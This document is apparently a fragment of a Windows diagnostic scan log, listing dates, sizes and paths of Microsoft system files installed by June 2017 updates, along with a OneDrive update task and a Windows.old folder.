2017-06-14 20:30 - 2017-06-03 11:01 - 06726656 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2017-06-14 20:30 - 2017-06-03 11:01 - 02804736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-06-14 20:30 - 2017-06-03 11:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 11:00 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 04730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02625024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 02056192 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-06-14 20:30 - 2017-06-03 10:59 - 01293824 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 01142784 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-06-14 20:30 - 2017-06-03 10:59 - 00975360 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-06-14 20:30 - 2017-06-03 10:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02650112 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2017-06-14 20:30 - 2017-06-03 10:58 - 00827392 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 11870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-06-14 20:30 - 2017-06-03 10:57 - 05557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 02829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01675264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-06-14 20:30 - 2017-06-03 10:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-06-14 20:30 - 2017-06-03 10:56 - 06292992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 03656192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-06-14 20:30 - 2017-06-03 10:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-06-14 20:30 - 2017-06-03 10:54 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwcreator.exe
2017-06-14 20:30 - 2017-06-03 10:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-06-14 20:30 - 2017-06-03 10:51 - 00064512 _____ (Microsoft Corporation) C:\WINDOWS\bfsvc.exe
2017-06-12 21:56 - 2017-06-14 20:22 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-06-12 21:55 - 2017-06-12 21:55 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2017-06-12 21:54 - 2017-06-12 21:54 - 00000020 ___SH C:\Users\ararat\ntuser.ini
2017-06-08 09:54 - 2017-07-03 01:27 - 00000000 ____D C:\Windows.old
2017-06-08 09:54 - 2017-06-08 09:54 - 17365504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 13840384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 08331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 07325584 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 06551856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05821496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05802968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 05225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04847928 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04709528 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04707840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04672848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04537344 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04469832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 04446208 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04396032 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 04056576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03135488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 03116184 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02938880 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02765824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 02679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02635336 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02604256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02443776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02424016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02347520 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02211328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02158544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02088960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 02077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 02008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-06-08 09:54 - 2017-06-08 09:54 - 01984000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01911752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01852776 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01803264 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01706496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01700408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01557288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01536512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01506712 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01474800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01459728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01455592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01450496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01333136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01325456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01302528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01275904 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01266544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinapi.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01219560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01120864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01102848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01085440 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcss.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01078272 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01067008 _____ (Microsoft Corporation) C:\WINDOWS\system32\XboxNetApiSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01051648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01035264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 01028608 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00972800 _____ (Microsoft Corporation) C:\WINDOWS\system32\sysmain.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00961952 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00909824 _____ (Microsoft Corporation) C:\WINDOWS\system32\ISM.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00899584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00892416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\autochk.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\system32\NPSMDesktopProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00846848 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00826368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NPSMDesktopProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00809472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthSSO.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00807424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00799232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00754080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00730016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00712608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00708712 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernel32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00667040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00654976 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdbui.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00606960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00601088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00599576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\system32\DictationManager.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00546208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2017-06-08 09:54 - 2017-06-08 09:54 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-06-08 09:54 - 2017-06-08 09:54 - 00543648 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
2017-06-08 09:54 - 2017-06-08 09:54 - 00527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-06-08 09:54 - 2017-06-08 09:54 - 00519680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
